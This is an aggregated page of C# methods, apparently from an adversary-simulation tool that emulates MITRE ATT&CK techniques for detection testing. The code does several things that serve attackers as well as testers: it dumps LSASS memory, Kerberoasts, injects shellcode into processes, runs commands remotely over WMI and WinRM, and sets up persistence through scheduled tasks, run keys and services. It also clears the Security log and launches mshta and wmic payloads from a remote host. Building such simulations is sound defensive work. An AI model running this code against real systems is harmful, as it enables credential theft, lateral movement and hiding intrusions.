Ejemplo n.º 1
0
        public static void CreateScheduledTaskCmd(string log, bool cleanup)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1053.005");
            logger.TimestampInfo("Using the command line to execute the technique");

            try
            {
                string taskName = "BadScheduledTask";
                string binpath  = @"C:\Windows\Temp\xyz12345.exe";
                ExecutionHelper.StartProcess("", String.Format(@"SCHTASKS /CREATE /SC DAILY /TN {0} /TR ""{1}"" /ST 13:00", taskName, binpath), logger);
                if (cleanup)
                {
                    ExecutionHelper.StartProcess("", String.Format(@"SCHTASKS /DELETE /F /TN {0}", taskName, binpath), logger);
                    Thread.Sleep(3000);
                }
                else
                {
                    logger.TimestampInfo(@"The created Scheduled Task " + taskName + " was not deleted as part of the simulation");
                }
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 2
0
        public static void DomaiGroupDiscoveryLdap(PlaybookTask playbook_task, string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1069.002");
            logger.TimestampInfo("Using LDAP to execute technique");
            try
            {
                if (playbook_task.groups.Length > 0)
                {
                    foreach (string group in playbook_task.groups)
                    {
                        logger.TimestampInfo(String.Format("Querying LDAP for members of '{0}'", group));
                        DiscoveryHelper.LdapQueryForObjects(logger, 2, "", group);
                    }
                    logger.SimulationFinished();
                }
                else
                {
                    logger.TimestampInfo("Querying LDAP for all groups");
                    DiscoveryHelper.LdapQueryForObjects(logger, 2);
                    logger.SimulationFinished();
                }
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 3
0
        public static void CreateLocalAccountCmd(string log, bool cleanup)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1136.001");
            logger.TimestampInfo("Using the command line to execute the technique");

            try
            {
                string username = "******";
                string pwd      = "Passw0rd123El7";
                ExecutionHelper.StartProcess("", String.Format("net user {0} {1} /add", username, pwd), logger);
                Thread.Sleep(2000);
                if (cleanup)
                {
                    ExecutionHelper.StartProcess("", String.Format("net user {0} /delete", username), logger);
                }
                else
                {
                    logger.TimestampInfo(String.Format("The created local user {0} was not deleted as part of the simulation", username));
                }


                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 4
0
        public static List <Computer> GetHostTargets(int servertype, int nhosts, Lib.Logger logger)
        {
            List <Computer> targethosts = new List <Computer>();

            /*
             * switch (servertype)
             * {
             *  case 1:
             *      targethosts = GetDomainNeighborTargets(nhosts);
             *      break;
             *
             *  case 2:
             *      targethosts = GetDomainRandomTargets(nhosts);
             *      break;
             *
             *  case 3:
             *      targethosts = GetServerRangeTargets(nhosts);
             *      break;
             *
             *  case 4:
             *      targethosts = GetNetworkNeighborTargets(nhosts);
             *      break;
             *
             *  default:
             *      return targethosts;
             * }
             */
            targethosts = GetDomainNeighborTargets(nhosts, logger);
            return(targethosts);
        }
Ejemplo n.º 5
0
        public static void CreateRegistryRunKeyCmd(string log, bool cleanup)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1547.001");
            logger.TimestampInfo("Using the command line to execute the technique");

            try
            {
                string regKey  = "BadApp";
                string binpath = @"C:\Windows\Temp\xyz12345.exe";

                ExecutionHelper.StartProcess("", String.Format(@"REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V {0} /t REG_SZ /F /D {1}", regKey, binpath), logger);
                if (cleanup)
                {
                    Thread.Sleep(3000);
                    ExecutionHelper.StartProcess("", String.Format(@"REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V {0} /F", regKey), logger);
                }
                else
                {
                    logger.TimestampInfo(@"The created RegKey : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" + regKey + " was not deleted as part of the simulation");
                }
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 6
0
        public static void ShareEnum(Computer computer, Lib.Logger logger)
        {
            var bufPtr       = IntPtr.Zero;
            var EntriesRead  = 0;
            var TotalRead    = 0;
            var ResumeHandle = 0;

            const uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF;

            //https://www.pinvoke.net/default.aspx/netapi32/netshareenum.html
            var res       = WinAPI.NetShareEnum(computer.Fqdn, 1, ref bufPtr, MAX_PREFERRED_LENGTH, ref EntriesRead, ref TotalRead, ref ResumeHandle);
            var errorCode = Marshal.GetLastWin32Error();


            var Offset = bufPtr.ToInt64();

            // 0 = syccess
            if (res == 0)
            {
                DateTime dtime = DateTime.Now;
                //Console.WriteLine("{0}[{1}] Successfully enumerated shares on {2} as {3} ", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn, WindowsIdentity.GetCurrent().Name);
                logger.TimestampInfo(String.Format("Successfully enumerated shares on {0} as {1} ", computer.Fqdn, WindowsIdentity.GetCurrent().Name));
            }
            else
            {
                DateTime dtime = DateTime.Now;
                //Console.WriteLine("{0}[{1}] Failed to enumerate shares on {2} as {3}. Error Code:{4}", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn, WindowsIdentity.GetCurrent().Name, errorCode);
                logger.TimestampInfo(String.Format("Successfully enumerated shares on {0} as {1} ", computer.Fqdn, WindowsIdentity.GetCurrent().Name));
            }
        }
Ejemplo n.º 7
0
        public static void PrivilegeEnumeration(int nhost, int sleep, string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T0XXX");
            logger.TimestampInfo("Using the System.Management .NET API to execute this technique");

            List <Task> tasklist     = new List <Task>();
            var         rand         = new Random();
            int         computertype = rand.Next(1, 6);

            List <Computer> targetcomputers = Lib.Targets.GetHostTargets(computertype, nhost, logger);

            Console.WriteLine("[*] Starting Find local administrator from {0} as {1}", Environment.MachineName, WindowsIdentity.GetCurrent().Name);
            if (sleep > 0)
            {
                Console.WriteLine("[*] Sleeping {0} seconds between enumeration", sleep);
            }
            foreach (Computer computer in targetcomputers)
            {
                if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper()))
                {
                    tasklist.Add(Task.Factory.StartNew(() =>
                    {
                        Simulations.DiscoveryHelper.FindLocalAdminAccess(computer);
                        if (sleep > 0)
                        {
                            Thread.Sleep(sleep * 1000);
                        }
                    }));
                }
            }
            Task.WaitAll(tasklist.ToArray());
        }
        public static void WmiCodeExecution(Computer computer, string command, Lib.Logger logger)
        {
            try
            {
                ConnectionOptions connectoptions = new ConnectionOptions();

                var processToRun = new[] { command };
                var wmiScope     = new ManagementScope(String.Format("\\\\{0}\\root\\cimv2", computer.Fqdn), connectoptions);
                var wmiProcess   = new ManagementClass(wmiScope, new ManagementPath("Win32_Process"), new ObjectGetOptions());
                wmiProcess.InvokeMethod("Create", processToRun);
                //DateTime dtime = DateTime.Now;
                logger.TimestampInfo(String.Format("Started a process using WMI Win32_Create on {0}", computer.ComputerName));
                //Console.WriteLine("{0}[{1}] Successfully created a process using WMI on {2}", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn);
            }
            catch (Exception ex)
            {
                //DateTime dtime = DateTime.Now;
                if (ex.Message.Contains("ACCESSDENIED"))
                {
                    logger.TimestampInfo(String.Format("Failed to start a process using WMI Win32_Create on {0}. (Access Denied)", computer.ComputerName));
                    //Console.WriteLine("{0}[{1}] Failed to execute execute a process using WMI on {2}. (Access Denied)", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn);
                }
                else
                {
                    logger.TimestampInfo(String.Format("Failed to start a process using WMI Win32_Create on {0}. {1}", computer.ComputerName, ex.GetType()));
                    //Console.WriteLine("{0}[{1}] Failed to execute a process using WMI on {2}. {3}", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn, ex.GetType());
                }
            }
        }
Ejemplo n.º 9
0
        public static void CreateWindowsServiceCmd(string log, bool cleanup)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1543.003");
            logger.TimestampInfo("Using the command line to execute the technique");

            try
            {
                string serviceName = "UpdaterService";
                string servicePath = @"C:\Windows\Temp\superlegit.exe";
                ExecutionHelper.StartProcess("", String.Format(@"sc create {0} binpath= {1} type= own start= auto", serviceName, servicePath), logger);
                Thread.Sleep(3000);
                if (cleanup)
                {
                    ExecutionHelper.StartProcess("", String.Format(@"sc delete {0}", serviceName), logger);
                }
                else
                {
                    logger.TimestampInfo(String.Format("The created Service: {0} ImagePath: {1} was not deleted as part of the simulation", serviceName, servicePath));
                }
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 10
0
        public static void Kerberoasting(string log, int sleep)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1558.003");


            if (sleep > 0)
            {
                logger.TimestampInfo(String.Format("Sleeping {0} seconds between each service ticket request", sleep));
            }

            try
            {
                //NetworkCredential cred = null;
                List <String> spns;
                spns = Ldap.GetSPNs();

                foreach (String spn in spns)
                {
                    Lib.SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger);
                    if (sleep > 0)
                    {
                        Thread.Sleep(sleep * 1000);
                    }
                }
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 11
0
        public static void Kerberoasting(string log, int sleep = 0)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1208");
            //logger.TimestampInfo(String.Format("Starting T1208 Simulation on {0}", Environment.MachineName));
            //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
            if (sleep > 0)
            {
                Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
            }

            try
            {
                //NetworkCredential cred = null;
                List <String> spns;
                spns = Ldap.GetSPNs();

                foreach (String spn in spns)
                {
                    Lib.SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger);
                    if (sleep > 0)
                    {
                        Thread.Sleep(sleep * 1000);
                    }
                }
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 12
0
        public static void StartProcess_old(string binary, string cmdline, Lib.Logger logger, bool cleanup = false)
        {
            if (!cleanup)
            {
                logger.TimestampInfo("Executing Command: " + cmdline);
            }
            else
            {
                logger.TimestampInfo("Executing Cleanup Command: " + cmdline);
            }

            const uint NORMAL_PRIORITY_CLASS = 0x0020;
            bool       retValue;

            Structs.PROCESS_INFORMATION pInfo = new Structs.PROCESS_INFORMATION();
            Structs.STARTUPINFO         sInfo = new Structs.STARTUPINFO();
            Structs.SECURITY_ATTRIBUTES pSec  = new Structs.SECURITY_ATTRIBUTES();
            Structs.SECURITY_ATTRIBUTES tSec  = new Structs.SECURITY_ATTRIBUTES();
            pSec.nLength = Marshal.SizeOf(pSec);
            tSec.nLength = Marshal.SizeOf(tSec);

            retValue = WinAPI.CreateProcess(null, cmdline, ref pSec, ref tSec, false, NORMAL_PRIORITY_CLASS, IntPtr.Zero, null, ref sInfo, out pInfo);

            if (retValue && cleanup == false)
            {
                logger.TimestampInfo(String.Format("Process successfully created. (PID): " + pInfo.dwProcessId));
            }
            else if (retValue != false && cleanup == false)
            {
                logger.TimestampInfo("Could not start process!");
            }
        }
Ejemplo n.º 13
0
        public static void ProcInjection_APC(byte[] shellcode, Process proc, Lib.Logger logger)
        {
            logger.TimestampInfo(String.Format("Calling OpenProcess on PID:{0}", proc.Id));
            IntPtr procHandle = WinAPI.OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, proc.Id);

            //IntPtr procHandle = WinAPI.OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, proc.Id);
            Int32 size = shellcode.Length;

            logger.TimestampInfo(String.Format("Calling VirtualAllocEx on PID:{0}", proc.Id));
            IntPtr  spaceAddr = WinAPI.VirtualAllocEx(procHandle, new IntPtr(0), (uint)size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            UIntPtr bytesWritten;
            IntPtr  size2 = new IntPtr(shellcode.Length);

            logger.TimestampInfo(String.Format("Calling WriteProcessMemory on PID:{0}", proc.Id));
            bool bWrite     = WinAPI.WriteProcessMemory(procHandle, spaceAddr, shellcode, (uint)size2, out bytesWritten);
            uint oldProtect = 0;

            bWrite = WinAPI.VirtualProtectEx(procHandle, spaceAddr, shellcode.Length, PAGE_EXECUTE_READ, out oldProtect);

            //TODO: do we need to do it for all threads ?
            foreach (ProcessThread thread in proc.Threads)
            {
                IntPtr tHandle = WinAPI.OpenThread(Structs.ThreadAccess.THREAD_HIJACK, false, (int)thread.Id);
                logger.TimestampInfo(String.Format("Calling QueueUserAPC on ThreadId:{0}", thread.Id));
                IntPtr ptr = WinAPI.QueueUserAPC(spaceAddr, tHandle, IntPtr.Zero);
            }
        }
Ejemplo n.º 14
0
        public static void ProcessInjection(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1055");
            //logger.TimestampInfo(String.Format("Starting T1055 Simulation on {0}", Environment.MachineName));
            //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
            try
            {
                Process proc = new Process();
                proc.StartInfo.FileName        = "C:\\Windows\\system32\\notepad.exe";
                proc.StartInfo.UseShellExecute = false;
                proc.Start();
                logger.TimestampInfo(String.Format("Process {0}.exe with PID:{1} started for the injection", proc.ProcessName, proc.Id));

                DefenseEvasionHelper.ProcInjection_CreateRemoteThread(Convert.FromBase64String(Lib.Static.donut_ping), proc, logger);
                //DefenseEvasionHelper.ProcInjection_APC(Convert.FromBase64String(Lib.Static.donut_ping), proc, logger);

                //DefenseEvasionHelper.ProcInjection_CreateRemoteThread(Lib.Static.msf_meter, not);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 15
0
        public static List <Computer> GetDomainRandomTargets(int count, Lib.Logger logger)
        {
            List <Computer> targets = new List <Computer>();

            Console.WriteLine("[*] Obtaining domain random targets ...");
            targets = Ldap.GetADComputers(count, logger);

            return(targets);
        }
Ejemplo n.º 16
0
        public static List <Computer> GetDomainNeighborTargets(int count, Lib.Logger logger)
        {
            List <Computer>  targets = new List <Computer>();
            PrincipalContext context = new PrincipalContext(ContextType.Domain);
            string           dc      = context.ConnectedServer;

            logger.TimestampInfo("Obtaining domain neighbor targets ...");
            targets = Ldap.GetADComputers(count, logger, dc);
            //Console.WriteLine("[*] Finished");
            return(targets);
        }
Ejemplo n.º 17
0
        public static void RegistryRunKey(Lib.Logger logger)
        {
            RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);

            //RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true);
            registryKey1.SetValue("BadApp", @"C:\Windows\Temp\xyz123456.exe");
            logger.TimestampInfo(@"Created Regkey: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run - C:\Windows\Temp\xyz123456.exe ");
            //registryKey2.SetValue("BadApp", @"C:\Windows\Temp\xyz123456.exe");
            //logger.TimestampInfo(@"Created Regkey: HKCU\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce - C:\Windows\Temp\xyz123456.exe ");
            registryKey1.DeleteValue("BadApp");
            logger.TimestampInfo(@"Deleted : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
            //registryKey2.DeleteValue("BadApp");
            //logger.TimestampInfo(@"Deleted: HKCU\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce");
        }
Ejemplo n.º 18
0
        static public void WindowsCommandShell(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1059.003");
            try
            {
                ExecutionHelper.StartProcessApi("", "cmd.exe /C whoami", logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 19
0
        public static void LsassMemoryDump(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1003.001");
            try
            {
                CredAccessHelper.LsassMemoryDump(logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 20
0
        static public void SystemNetworkConfigurationDiscovery(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1016");
            try
            {
                ExecutionHelper.StartProcess("", "ipconfig /all", logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
        public static void WinRMCodeExecution(Computer computer, string command, Lib.Logger logger)
        {
            try
            {
                var connectTo  = new Uri(String.Format("http://{0}:5985/wsman", computer.Fqdn));
                var connection = new WSManConnectionInfo(connectTo);
                var runspace   = RunspaceFactory.CreateRunspace(connection);
                runspace.Open();
                using (var powershell = PowerShell.Create())
                {
                    powershell.Runspace = runspace;
                    powershell.AddScript(command);
                    var results = powershell.Invoke();
                    runspace.Close();
                    DateTime dtime = DateTime.Now;
                    logger.TimestampInfo(String.Format("Started a process using WinRM on {0}", computer.ComputerName));
                    //Console.WriteLine("{0}[{1}] Successfully created a process using WinRM on {2}", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn);

                    /*
                     * Console.WriteLine("Return command ");
                     * foreach (var obj in results.Where(o => o != null))
                     * {
                     *  Console.WriteLine("\t" + obj);
                     * }
                     */
                }
            }
            catch (Exception ex)
            {
                DateTime dtime = DateTime.Now;
                if (ex.Message.Contains("Access is denied"))
                {
                    logger.TimestampInfo(String.Format("Failed to start a process using WinRM on {0}. (Access Denied)", computer.Fqdn));
                    //Console.WriteLine("{0}[{1}] Failed to execute execute a process using WMI on {2}. (Access Denied)", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn);
                }
                else if (ex.GetType().ToString().Contains("PSRemotingTransportException"))
                {
                    logger.TimestampInfo(String.Format("Failed to start a process using WinRM on {0}. (Port Closed)", computer.Fqdn));
                    //Console.WriteLine("{0}[{1}] Failed to execute execute a process using WMI on {2}. (Port Closed)", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn);
                }
                else
                {
                    logger.TimestampInfo(String.Format("Failed to start a process using WinRM on {0}. {1}", computer.Fqdn, ex.GetType()));
                    //Console.WriteLine("{0}[{1}] Failed to execute a process using WinRM on {2}. {3}", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn, ex.GetType());
                }
            }
        }
Ejemplo n.º 22
0
        public static void ClearSecurityEventLogCmd(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1070.001");
            logger.TimestampInfo("Using the command line to execute the technique");
            try
            {
                ExecutionHelper.StartProcess("", "wevtutil.exe cl Security", logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 23
0
        public static void InstallUtil(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1218.004");
            try
            {
                string file = @"C:\Windows\Temp\XKNqbpzl.exe";
                ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfiles /LogToConsole=alse /U {0}", file), logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 24
0
        public static void XlScriptProcessing(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1220");
            try
            {
                string url = "http://webserver/payload.xsl";
                ExecutionHelper.StartProcess("", String.Format("wmic os get /FORMAT:\"{0}\"", url), logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 25
0
        public static void Rundll32(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1218.011");
            try
            {
                string file = @"C:\Windows\twain_64.dll";
                ExecutionHelper.StartProcess("", String.Format("rundll32 \"{0}\"", file), logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 26
0
        public static void Csmtp(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1218.003");
            try
            {
                string file = @"C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt";
                ExecutionHelper.StartProcess("", String.Format("cmstp /s /ns {0}", file), logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 27
0
        public static void Mshta(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1218.005");
            try
            {
                string url = "http://webserver/payload.hta";
                ExecutionHelper.StartProcess("", String.Format("mshta {0}", url), logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 28
0
        public static void SystemServiceDiscovery(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1007");
            try
            {
                ExecutionHelper.StartProcess("", "net start", logger);
                ExecutionHelper.StartProcess("", "tasklist /svc", logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 29
0
        public static void SystemUserDiscovery(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1033");
            try
            {
                ExecutionHelper.StartProcess("", "whoami", logger);
                ExecutionHelper.StartProcess("", "query user", logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }
Ejemplo n.º 30
0
        static public void ExecuteWmiCmd(string log)
        {
            string currentPath = AppDomain.CurrentDomain.BaseDirectory;

            Lib.Logger logger = new Lib.Logger(currentPath + log);
            logger.SimulationHeader("T1047");
            logger.TimestampInfo("Using the command line to execute the technique");
            try
            {
                ExecutionHelper.StartProcessNET("wmic.exe", String.Format(@"process call create ""powershell.exe"""), logger);
                logger.SimulationFinished();
            }
            catch (Exception ex)
            {
                logger.SimulationFailed(ex);
            }
        }